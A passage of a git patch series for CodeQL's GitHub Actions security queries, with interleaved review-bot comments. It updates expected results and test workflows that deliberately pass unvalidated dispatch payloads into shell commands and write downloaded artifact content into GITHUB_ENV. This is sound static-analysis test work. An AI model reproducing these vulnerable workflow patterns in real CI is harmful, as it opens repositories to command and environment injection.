Rollback {{ github.event.client_payload.connector_name }} release candidate + id: rollback-release-candidate + if: ${{ env.ACTION == 'rollback' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ 
secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + spec_cache_gcs_credentials: ${{ secrets.SPEC_CACHE_SERVICE_ACCOUNT_KEY_PUBLISH }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --rollback-release-candidate" diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082fb..b66822accab3 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
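Review bot: The `action` input under `workflow_dispatch` lists `options: ["promote", "rollback"]` but has no `type: choice`, so GitHub treats it as free text and the list is not enforced; the "Check action value" step is therefore the only validation of `ACTION`, which is presumably deliberate for the fixture but worth stating in a comment. By contrast `connector_name` from the `repository_dispatch` client payload reaches `subcommand` in both `run-airbyte-ci` steps without any validation, which is the sink the new expected rows record; a short comment on those `subcommand:` lines, `# unvalidated client_payload value reaches the action's shell command (expected finding)`, would make the fixture self-explanatory. Finally, both step names use `{{ github.event.client_payload.connector_name }}` without the leading `$`, so they render literally; harmless here, but `${{ ... }}` if the intent is to mirror the upstream workflow.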
@@ -1,6 +1,13 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index 99ebb1edc05d..393dde04f356 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected 
@@ -1,5 +1,14 @@ edges +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | provenance | | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | provenance | | nodes +| .github/actions/run-airbyte-ci/action.yaml:4:3:4:12 | input subcommand | semmle.label | input subcommand | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | semmle.label | inputs.subcommand | | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | +| .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | semmle.label | github.event.client_payload.connector_name | subpaths #select +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:46:42:46:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | +| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | .github/workflows/test1.yml:63:42:63:90 | github.event.client_payload.connector_name | .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | Potential command injection in $@, which may be controlled by an external user. 
| .github/actions/run-airbyte-ci/action.yaml:163:118:163:141 | inputs.subcommand | ${{ inputs.subcommand }} | From 4edfdb4101ea98948304f253c981e3a4bc4ed8bb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:59:23 +0200 Subject: [PATCH 550/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6f57c4554d07..00d8e21c05df 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.58 +version: 0.1.59 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d3b65425c413..94468d4b96c8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.58 +version: 0.1.59 groups: [actions, queries] suites: codeql-suites extractor: javascript From c10d5a113e9ce3d0535335512b025bbf368fa604 Mon Sep 17 00:00:00 2001 From: Rasmus Wriedt Larsen Date: Mon, 30 Sep 2024 15:13:32 +0200 Subject: [PATCH 551/707] Rename help-file to match .ql file Reported by running ``` codeql generate query-help --format sarifv2.1.0 --output help.sairf ql/src/codeql-suites/actions-code-scanning.qls ``` --- ...stedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename ql/src/Security/CWE-367/{UntrustedCheckoutTOCTOUMedium.md => UntrustedCheckoutTOCTOUHigh.md} (100%) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md similarity index 100% rename from ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md rename to ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md From e0a2eb93d6ce3ccb2680412a7dc27fcefb2aacdb Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 30 Sep 2024 15:27:15 +0200 Subject: [PATCH 552/707] fix: Repository checks do not protect workflow_run triggered jobs --- .../codeql/actions/security/ControlChecks.qll | 31 +++++++++-- .../CWE-077/.github/workflows/test11.yml | 55 +------------------ .../CWE-077/EnvVarInjectionCritical.expected | 12 ++-- .../CWE-077/EnvVarInjectionMedium.expected | 11 +--- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../workflows/untrusted_checkout_5.yml | 23 ++++++++ .../workflows/untrusted_checkout_6.yml | 23 ++++++++ .../workflow_run_untrusted_checkout_2.yml | 19 +++++++ .../workflow_run_untrusted_checkout_3.yml | 19 +++++++ .../UntrustedCheckoutCritical.expected | 8 +++ .../CWE-829/UntrustedCheckoutHigh.expected | 2 + 11 files changed, 128 insertions(+), 77 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_5.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout_6.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index b9410f0fcb02..134ce780eeed 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -99,9 +99,6 @@ abstract class RepositoryCheck extends ControlCheck { // for pull_requests, that means that it triggers only on local branches or repos from the same org // - they are effective against pull requests/workflow_run since they can control where the code is coming from // - they are not effective against issue_comment since the repository will always be the same - override predicate protectsCategoryAndEvent(string category, string event) { - event = ["pull_request_target", "workflow_run"] and category = any_relevant_category() - } } abstract class PermissionCheck extends ControlCheck { @@ -173,9 +170,9 @@ class ActorIfCheck extends ActorCheck instanceof If { } } -class RepositoryIfCheck extends RepositoryCheck instanceof If { - RepositoryIfCheck() { - // eg: github.repository == 'test/foo' +class PullRequestTargetRepositoryIfCheck extends RepositoryCheck instanceof If { + PullRequestTargetRepositoryIfCheck() { + // eg: github.event.pull_request.head.repo.full_name == github.repository exists( normalizeExpr(this.getCondition()) // github.repository in a workflow_run event triggered by a pull request is the base repository 
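Review bot: Removing the `protectsCategoryAndEvent` override from the abstract `RepositoryCheck` changes the contract for every concrete subclass, not just the two `If` classes touched by this commit: any other `RepositoryCheck` subclass elsewhere in the file (a `uses`-based check, for instance) silently stops protecting any event unless `ControlCheck` declares the predicate abstract, and that declaration is outside these hunks, so please confirm. A comment on the abstract class would make the new contract explicit, e.g. `// Subclasses must override protectsCategoryAndEvent: a repository check only covers the event whose payload field it inspects.`. In the second hunk, the kept context comment `// github.repository in a workflow_run event triggered by a pull request is the base repository` now sits inside `PullRequestTargetRepositoryIfCheck`, where it no longer explains the regexes that follow; it belongs with the `workflow_run` class added in the next hunk. The body of `PullRequestTargetRepositoryIfCheck` continues past the end of this hunk.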
@@ -188,6 +185,28 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { ], _, _) ) } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "pull_request_target" and category = any_relevant_category() + } +} + +class WorkflowRunRepositoryIfCheck extends RepositoryCheck instanceof If { + WorkflowRunRepositoryIfCheck() { + // eg: github.event.workflow_run.head_repository.full_name == github.repository + exists( + normalizeExpr(this.getCondition()) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) + ) + } + + override predicate protectsCategoryAndEvent(string category, string event) { + event = "workflow_run" and category = any_relevant_category() + } } class AssociationIfCheck extends AssociationCheck instanceof If { diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml index 2c2480f5353c..5edd526d8201 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml 
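Review bot: `WorkflowRunRepositoryIfCheck` only requires that one of the two `head_repository` fields appears somewhere in the normalized condition, not that it is compared against `github.repository`, so a condition that negates or merely mentions the field is classified as a protective check just the same. The sibling class uses the same presence-only approach, so if this is the intended precision/recall trade-off a comment in the characteristic predicate would help reviewers, e.g. `// presence of a head_repository field is taken as evidence of a repo check; the comparison itself is not verified`. It is also worth confirming the second pattern against the `workflow_run` payload: owner objects in GitHub event payloads carry `login`, and if real workflows compare `head_repository.owner.login` this regex would miss them — hedged, since the payload schema cannot be checked from here. The class `PullRequestTargetRepositoryIfCheck` that the first part of this hunk closes starts in the previous hunk.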
@@ -8,37 +8,11 @@ on: jobs: comment: - if: ${{ github.repository_owner == 'cloudflare' }} + if: ${{ github.repository_owner == 'foo' }} runs-on: ubuntu-latest name: Write comment to the PR steps: - - name: "Put PR and workflow ID on the environment" - uses: actions/github-script@v7 - with: - script: | - // Copied from .github/extract-pr-and-workflow-id.js - const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ - owner: context.repo.owner, - repo: context.repo.repo, - run_id: context.payload.workflow_run.id, - }); - - for (const artifact of allArtifacts.data.artifacts) { - // Extract the PR number from the artifact name - const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); - if (match) { - const packageName = match[1].toUpperCase(); - require("fs").appendFileSync( - process.env.GITHUB_ENV, - `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + - `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` - ); - } - } - - name: "Download runtime versions" - # Regular `actions/download-artifact` doesn't support downloading - # artifacts from another workflow uses: dawidd6/action-download-artifact@v2 with: run_id: ${{ github.event.workflow_run.id }} @@ -52,30 +26,3 @@ jobs: cat runtime-versions.md echo EOF } >> "$GITHUB_ENV" - - - name: "Download pre-release report" - uses: dawidd6/action-download-artifact@v2 - with: - run_id: ${{ github.event.workflow_run.id }} - name: prerelease-report.md - - - name: "Put pre-release report on the environment" - id: prerelease_report - run: | - { - echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" - - - name: "Comment on PR with Wrangler link" - uses: marocchino/sticky-pull-request-comment@v2 - with: - number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} - message: | - ${{ env.PRERELEASE_REPORT }} - - --- - - ${{ env.RUNTIME_VERSIONS }} - 
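Review bot: The retained `if: ${{ github.repository_owner == 'foo' }}` on the `comment` job is exactly the negative case this commit is about (on a `workflow_run` trigger `repository_owner` is always the base repository, so the check does not exclude fork-originated runs), but nothing in the trimmed fixture says so, and the updated expected files now report this job as a finding. A comment above the job would keep the fixture self-explanatory, e.g. `# repository_owner is the base repo on workflow_run; this check does not protect against fork PRs, so the env write below is expected to be flagged`. The second hunk in this file is a pure deletion and needs no note.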
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index cbd17161942b..6ad5cf043044 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | 
@@ -100,6 +95,7 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index e780af4107dd..82602ee8ed88 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -20,10 +20,7 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | @@ -69,10 +66,8 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | 